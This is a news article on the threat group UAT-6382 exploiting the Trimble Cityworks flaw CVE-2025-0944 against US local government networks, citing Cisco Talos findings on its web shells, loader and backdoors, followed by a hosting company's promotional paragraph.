A Chinese-speaking cyber threat group identified as UAT-6382 has been linked to the exploitation of a recently patched remote-code-execution flaw in the Trimble Cityworks software. This breach, which involved the vulnerability CVE-2025-0944, enabled the attackers to deploy Cobalt Strike and VShell tools.

According to Cisco Talos researchers, UAT-6382 successfully exploited the vulnerability, conducted reconnaissance, and swiftly implemented various web shells and bespoke malware to maintain ongoing system access. Their activity primarily targeted enterprise networks associated with local government bodies in the United States, beginning in January 2025.

CVE-2025-0944 was regarded as particularly serious, receiving a CVSS score of 8.6, indicating a high risk for remote code execution due to deserialization issues. The flaw was noted in the asset management software utilized by many organizations and was added to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) list in February 2025.

Indicators of compromise released by Trimble noted that threat actors utilized this vulnerability to deliver a Rust-based loader that in turn launched Cobalt Strike and a Go-based remote access tool. Cisco Talos has classified this Rust-based loader as TetraLoader, developed through MaLoader, a publicly available malware-building tool.

Successful exploitation of Cityworks allowed UAT-6382 to perform preliminary reconnaissance to fingerprint the compromised servers. They then deployed various web shells, widely employed by Chinese hacking entities, such as AntSword and chinatso/Chopper, to facilitate their operations. The group was observed enumerating directories and staging files on the infected servers, thereby simplifying data exfiltration.

Researches highlighted that UAT-6382’s approach involved downloading and deploying multiple backdoors onto compromised systems via PowerShell, solidifying their foothold within the targeted networks.

Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.